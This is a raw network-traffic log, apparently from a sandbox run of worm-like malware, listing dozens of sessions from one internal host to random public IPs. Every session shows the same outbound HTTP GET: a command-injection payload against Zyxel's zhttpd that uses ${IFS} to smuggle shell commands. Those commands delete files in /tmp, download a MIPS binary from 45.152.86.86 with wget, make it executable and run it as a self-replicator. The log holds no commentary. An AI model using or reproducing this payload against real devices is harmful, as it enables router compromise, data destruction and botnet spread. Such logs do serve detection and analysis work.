                                        Mar 31, 2024 09:20:36.289911985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1161192.168.2.2339350154.135.144.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.289963961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1162192.168.2.2348176209.13.159.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.289995909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1163192.168.2.233506268.4.12.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290051937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1164192.168.2.2356336174.187.167.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290105104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1165192.168.2.2344968203.63.116.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290137053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1166192.168.2.234444640.103.82.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290190935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1167192.168.2.2332934133.225.151.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290225983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1168192.168.2.2359902223.196.61.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290261984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1169192.168.2.2333814178.102.20.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290318012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1170192.168.2.2357972157.169.191.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290361881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1171192.168.2.234679845.77.96.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290412903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1172192.168.2.2360584207.247.24.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290458918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1173192.168.2.233693043.212.221.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290482044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1174192.168.2.235772032.82.132.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290533066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1175192.168.2.2333554151.76.233.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290572882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1176192.168.2.233682874.59.125.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290611029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1177192.168.2.233942842.233.47.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290657043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1178192.168.2.2333980222.187.246.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290714025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1179192.168.2.233739690.125.80.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290750980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1180192.168.2.2356464158.151.14.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290786028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1181192.168.2.236093091.135.199.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290834904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1182192.168.2.233373490.159.211.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290878057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1183192.168.2.2351338212.167.216.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290914059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1184192.168.2.2345940110.199.88.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290966034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1185192.168.2.234002661.239.72.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.290990114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1186192.168.2.2334262142.234.228.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291033030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1187192.168.2.2356726184.55.37.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291079044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1188192.168.2.2360572124.170.58.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291115046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1189192.168.2.2340802202.232.226.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291167021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1190192.168.2.2342932222.59.225.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291227102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1191192.168.2.234721858.176.13.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291255951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1192192.168.2.2355392151.123.87.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291292906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1193192.168.2.233404267.179.76.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291337967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1194192.168.2.2341140192.227.39.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291373968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1195192.168.2.2350016163.247.0.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291423082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1196192.168.2.2353078130.27.123.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291454077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1197192.168.2.2345214217.55.221.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291496992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1198192.168.2.2354940172.206.120.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291546106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1199192.168.2.2360290194.121.51.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291587114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1200192.168.2.234440654.228.123.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291623116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1201192.168.2.234998859.110.236.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291659117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1202192.168.2.2348126194.104.39.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291699886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1203192.168.2.2356348128.165.122.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291733027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1204192.168.2.2358024191.187.201.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291785002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1205192.168.2.2336210121.131.116.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291822910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1206192.168.2.2359502166.49.113.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291870117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1207192.168.2.2334760204.15.222.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291904926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1208192.168.2.2352588174.4.155.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291934967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1209192.168.2.2338484137.83.139.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.291981936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1210192.168.2.2345620130.131.190.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292020082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1211192.168.2.2356772210.116.105.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292061090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1212192.168.2.2337056202.136.111.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292104959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1213192.168.2.2358990168.203.89.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292141914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1214192.168.2.234458032.42.21.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292191029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1215192.168.2.233458477.100.192.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292232990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1216192.168.2.234184681.215.186.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292284966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1217192.168.2.2350172141.124.35.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292325974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1218192.168.2.2344370203.169.111.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292359114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1219192.168.2.2344560100.203.84.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292418003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1220192.168.2.2342924178.37.202.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292455912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1221192.168.2.2343952212.177.103.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292510986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1222192.168.2.234495264.30.92.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292551994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1223192.168.2.236081093.151.71.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292603016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1224192.168.2.233331070.129.69.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292653084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1225192.168.2.2345032131.197.48.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292684078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1226192.168.2.2354424182.250.17.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292723894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1227192.168.2.23511489.117.27.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.292762041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1228192.168.2.2336904150.194.97.253443
                                        TimestampBytes transferredDirectionData
